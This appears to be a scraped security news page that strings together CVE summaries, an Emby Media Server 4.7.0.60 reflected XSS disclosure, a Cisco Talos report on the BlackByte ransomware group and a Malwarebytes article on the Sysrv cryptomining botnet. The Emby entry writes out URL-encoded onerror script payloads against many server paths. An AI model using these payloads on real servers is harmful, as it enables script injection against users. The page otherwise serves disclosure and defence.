Cleartext transmission of sensitive information. The following products are affected: Acronis Cyber Protect 15 (Windows) before build 29240

CVE-2022-30994

Cleartext transmission of sensitive information. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 29240

CVE-2022-30993

Open redirect via user-controlled query parameter. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 29240

CVE-2022-30992

HTML injection via report name. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 29240

CVE-2022-30991

SLM has an issue with Windows Unquoted/Trusted Service Paths Security Issue. All installations version 9.x.x prior to 9.20.1 should be patched.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2022-0883: Snow Globe Community

Emby Media Server version 4.7.0.60 suffers from a cross site scripting vulnerability.

    # Exploit Title: Emby Media Server 4.7.0.60 Cross Site Scripting # Google Dork: NA# Date: 18/05/2022# Exploit Author: Yehia Elghaly# Vendor Homepage: https://emby.media/# Software Link: https://emby.media/windows-server.html# Version: 4.7.0.60# Tested on: Windows 7 / 10Summary: Emby (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client-server model.Description: Reflected XSS  found on the follwoing paths GET /web/index.htmlwkdlv%3cimg%20src%3da%20onerror%3dalert('xssyf')%3etsz47 HTTP/1.1Host: 192.168.1.99:8096Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Accept-Encoding: gzip, deflateAccept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Connection: closeCache-Control: max-age=0/web/apploader.jsgavm5%3cimg%20src%3da%20onerror%3dalert(1)%3efekx9?v=4.7.0.60/web/manifest.jsono32b7%3cimg%20src%3da%20onerror%3dalert(1)%3ebhmxn /web/modules/common/strings/en-GB.jsons0ult%3cimg%20src%3da%20onerror%3dalert(1)%3es9n62?v=4.7.0.60/web/modulesd3s7a%3cimg%20src%3da%20onerror%3dalert(1)%3ez7ego/common/strings/en-GB.json?v=4.7.0.60 /web/modules/commonat2op%3cimg%20src%3da%20onerror%3dalert(1)%3eobgl7/strings/en-GB.json?v=4.7.0.60/web/modules/common/stringshh0u9%3cimg%20src%3da%20onerror%3dalert(1)%3et78cc/en-GB.json?v=4.7.0.60/web/modules/themes/dark/theme.jsonl0ofz%3cimg%20src%3da%20onerror%3dalert(1)%3edltvh?v=4.7.0.60/web/modulesx4l2h%3cimg%20src%3da%20onerror%3dalert(1)%3emr73x/themes/dark/theme.json?v=4.7.0.60 /web/modules/themesm2gyr%3cimg%20src%3da%20onerror%3dalert(1)%3ek2oyi/dark/theme.json?v=4.7.0.60/web/modules/themes/darknhu2c%3cimg%20src%3da%20onerror%3dalert(1)%3ez9cpp/theme.json?v=4.7.0.60/web/startup/login.htmljpi2c%3cimg%20src%3da%20onerror%3dalert(1)%3enwvie?v=4.7.0.60/web/startupipm82%3cimg%20src%3da%20onerror%3dalert(1)%3ei44hr/login.html?v=4.7.0.60/web/strings/en-GB.jsonqulu8%3cimg%20src%3da%20onerror%3dalert(1)%3eghzge?v=4.7.0.60/web/stringsxyvvd%3cimg%20src%3da%20onerror%3dalert(1)%3ewliqe/en-GB.json?v=4.7.0.60

Emby Media Server 4.7.0.60 Cross Site Scripting

The Zoom Client for Meetings (for Android, iOS, Linux, MacOS, and Windows) before version 5.10.0 failed to properly parse XML stanzas in XMPP messages. This can allow a malicious user to break out of the current XMPP message context and create a new message context to have the receiving users client perform a variety of actions.This issue could be used in a more sophisticated attack to forge XMPP messages from the server.

CVE-2022-22784: Security Bulletin

News summary Cisco Talos has been monitoring the BlackByte Ransomware Group for several months, infecting victims all over the world, from North America to Colombia, Netherlands, China, Mexico and Vietnam.The FBI released a joint cybersecurity advisory in February 2022 warning about this group,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

  
**News summary**

*   Cisco Talos has been monitoring the BlackByte Ransomware Group for several months, infecting victims all over the world, from North America to Colombia, Netherlands, China, Mexico and Vietnam.
*   The FBI released a joint cybersecurity advisory in February 2022 warning about this group, stating that the group has targeted at least three critical infrastructure sectors in the U.S.
*   Talos has monitored ongoing BlackByte attacks dating back to March.
*   BlackByte updated its leak site with a new design and new victims and is still actively exploiting victims worldwide. 

**Executive overview**

The BlackByte ransomware group uses its software for its own goals and as a ransomware-as-a-service offering to other criminals. The ransomware group and its affiliates have infected victims all over the world, from North America to Colombia, the Netherlands, China, Mexico and Vietnam. Talos has been monitoring BlackByte for several months and we can confirm they are still active after the FBI released a joint cybersecurity advisory in February 2022. Additionally, BlackByte is considered part of the big game ransomware groups, which are targeting large, high-profile targets, looking to exfiltrate internal data and threatening to publicly release it. Like similar groups, they have their own leaks site on the darknet. The actual TOR address of this site is frequently moved. Below, you can see a screenshot of the site. We have anonymized the screenshot to protect victims' privacy. 

  

The attack usually starts with a network entry point, either a previously compromised host or a software vulnerability which is exploitable from the network. The former compromised host elevates local and domain account privileges and moves laterally by using standard penetration testing and legit administrator tools (LoLBins). In most incidents, they like to use the AnyDesk remote management software to control victim machines. 

**Technical details**

The BlackByte gang often uses phishing and/or vulnerable unpatched applications or services like vulnerable versions of SonicWall VPN or the ProxyShell vulnerability in Microsoft Exchange servers to gain access to the victim's network. These are usually known public vulnerabilities that the targets haven't patched in a timely manner. Due to a lack of logs, we could not confirm the initial infection vector in the case below, but we have indicators that a vulnerable Microsoft Exchange Server was compromised, which matches the previously described behavior of the BlackByte actor.

A typical timeline of infection looks similar to the anonymized log below, which we saw in our telemetry in March.

  
  
The logs above show the adversaries are installing the AnyDesk remote management software, as we've seen in Cisco Talos Incident Response engagements. BlackByte seems to have a preference for this tool and often uses typical living-off-the-land binaries (LoLBins), besides other publicly available commercial and non-commercial software like 'netscanold' or 'psexec'. These tools are also often used by Administrators for legitimate tasks, so it can be difficult to detect them as a malicious threat. It seems to be that executing the actual ransomware is the last step once they are done with lateral movement and make themselves persistent in the network by adding additional admin accounts.

Unfortunately, we could not obtain the RANDOMNAME\_n.EXE files, which are likely stages of the ransomware infection. We also tried to get them via the telemetry of our partners, but the hash was unknown to them, too. This points to the same trend that many big game ransomware groups moved to the tactic of using unique obfuscated files for every victim. The chat with a criminal from the ransomware group Hive we've transcribed below provides an idea of how these conversations go. We are releasing more details about conversations with ransomware actors in a future post.

> **Victim:** "How many files are stolen? and can you share some file names?"
> 
> **Hive:** "Hello"  
> **  
> Victim:** "maybe no ones here"
> 
> **Hive:** "To decrypt your files you have to pay $20,000,000 in Bitcoin."
> 
> **Victim:** "that's way too much, can you please discount and please share the hash of the ransomware file so we can at least black list it. You have already stolen everything anyway"
> 
> **Hive:** "We don't provide any hashes. Every time the software is unique. There is no need of hashes here. It will not help anyway."
> 
> **Hive:** "If you want a discount I would like to see for how much"

Assuming that RANDOMNAME.EXE -a <SUSPICIOUS NUMBER> is the start of the ransomware infection process, they have slightly changed their behavior or are just using a different packer. The FBI document states "complex.exe -single <SHA256>" launches the infection process. In our case, the parameters are different — the first one is a '-a' and the following is not a SHA256 hash, it is an eight-digit number, like '42269874' (not the real number, but similar to keeping the privacy of the victim). This seems to be a victim ID or an offset for the unpacking process. The actual behavior of RANDOMNAME.EXE seems to be very similar to the complexe.exe one described in the FBI report. It also disables Windows Defender. The base64-obfuscated string 'VwBpAG4ARABlAGYAZQBuAGQA' decodes to 'WinDefend', which is the Windows Defender service. It then tries to disable Florian Roth's Raccine ransomware protection tool and a few other commands mentioned in the FBI document.

Finally, approximately 17 hours after the ransomware infection process started, the machine reboots and the ransomware note "BlackByteRestore.txt" is shown to the user via Notepad.

**Conclusion**

Talos research and other public reports about BlackByte are mainly pointing to vulnerable, outdated systems as the initial infection vector. This threat shows how important it is to have a proper update strategy in place. If your organization is running a Microsoft Exchange Server or any other internet-facing system, make sure it always has the latest patch in place. The time window between the announcement of a new security vulnerability and its weaponization and use by criminals is getting smaller every year.

It's more important now than ever to have a multi-layered security architecture to detect these types of attacks. The adversary is likely to manage to bypass one of the other cybersecurity measures, but it is much harder for them to bypass all of them. These campaigns and the refinement of the TTPs used will likely continue for the foreseeable future. 

**Coverage**

Ways our customers can detect and block this threat are listed below.  

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**Orbital Queries**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat.

**IOCs**

  
To protect the privacy of the victim we can only release the anonymized logs above, but we hope this helps SOC and security staff to build their own custom rules to protect their assets.  

Typical log data in text format.

The BlackByte ransomware group is striking users all over the globe

The Sysrv botnet has been developing over the last years, and has become a multi-platform botnet that specializes in Monero cryptomining.
The post Sysrv botnet is out to mine Monero on your Windows and Linux servers appeared first on Malwarebytes Labs.

In a Twitter thread, the Microsoft Security Intelligence team have revealed new information about the latest versions of the Sysrv botnet.

The variant they focused on uses a range of known exploits for vulnerabilities in web apps and databases to install cryptocurrency miners on both Windows and Linux systems.

**Background**

The Sysrv botnet first received attention at the end of 2020 because at the time it was one of the rare malware binaries written in Golang (aka GO). Since then the botnet has evolved, gained new features, and changed its behavior. One of the advantages of the Golang language for malware authors is that it allows them to create multi-platform malware—the same malware binaries can be used against Windows and Linux machines.

The latest Sysrv variant scans the Internet for web servers that have security holes offering opportunities such as path traversal, remote file disclosure, and arbitrary file download bugs. Really, any vulnerability that can be exploited to infect the machines.

Once it has gained a foothold and the bot malware is running on a compromised system it deploys a Monero cryptocurrency miner.

**The favorite cryptocurrency**

The most popular cryptocurrency for attackers to mine is Monero. Monero is a cryptocurrency designed for privacy, promising “all the benefits of a decentralized cryptocurrency, without any of the typical privacy concessions”.

No cryptocurrency is anonymous, as many people think, but there are other reasons why cryptojackers favor Monero:

*   Many cryptomining algorithms run significantly better on ASICs or GPUs, but Monero mining algorithms run better on CPUs, which matches what the cryptojacker can expect to find in a containerized environment.
*   Like Bitcoin, Monero is one of the better known cryptocurrencies and therefore is expected to hold its value. That’s a big perk given the unrest in cryptocurrency markets at the time of writing.

With cryptocurrencies, users hide behind a pseudonym, like one or more wallet IDs. Their activities can be tracked—forever—so keeping their identity secret depends on how well they can separate their real identity from their wallet IDs.

**Linux malware**

While Linux malware was almost unheard of a few years ago, a couple of factors have “helped” the development of malware that targets Linux based systems. One is the development of languages that enable the creation of multiplatform malware like Golang. Another is the usage of Linux as the go-to operating system for many IoT devices.

IoT malware has matured over the years and has become popular, especially among botnets. With billions of Internet-connected devices like cars, household appliances, surveillance cameras, and network devices online, IoT devices are a very large bullseye for botnet malware.

The number of malware infections targeting Linux devices rose by 35% in 2021, most commonly to recruit IoT devices for distributed denial of service (DDoS) attacks. And around 95% of web servers run on Linux.

**Vulnerabilities**

Like many other botnets, Sysrv weaponizes bugs in WordPress plugins and in the Spring Framework.  It can rifle through WordPress files on compromised machines to take control of web server software. According to Microsoft:

> “A new behavior observed in Sysrv-K is that it scans for WordPress configuration files and their backups to retrieve database credentials, which it uses to gain control of the web server.”

The latest Sysrv variant also scans for Secure Shell (SSH) keys, IP addresses, and host names on infected machines so that it can use this information to spread via SSH connections. SSH keys are an access credential used in the SSH protocol and are foundational to modern Infrastructure-as-a-Service platforms such as AWS, Google Cloud, and Azure.

Another vulnerability the botnet uses is CVE-2022-22947. Some Spring cloud gateway version applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed, and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.

**Development**

The botnet malware starts with a simple script file that deploys modules of exploits against potentially vulnerable targets. Not only do the developers constantly add new exploits to the code, they keep updating the code. If the exploits aren’t successful, the developers get rid of them. Ever since the first appearance of the Sysrv botnet, the threat actors have released new scripts almost monthly.

**Mitigation**

Most of the vulnerabilities that the Sysrv botnet uses have been patched, so an effective patch management strategy can be a big help in keeping these miners off your systems.

Another strategy to looks at is whether all the servers that are at risk need to be Internet-facing. In some cases it may be better to take them offline.

Don’t forget to equip your servers with anti-malware protection. The time that you could rest assured that your Linux server would be safe is unfortunately over.

Safeguard your credentials and make sure that multi-factor authentication (MFA) is in place for your important assets.

Stay safe, everyone!

Sysrv botnet is out to mine Monero on your Windows and Linux servers

GPAC 2.0.0 misuses a certain Unicode utf8_wcslen (renamed gf_utf8_wcslen) function in utils/utf.c, resulting in a heap-based buffer over-read, as demonstrated by MP4Box.

Tag

#windows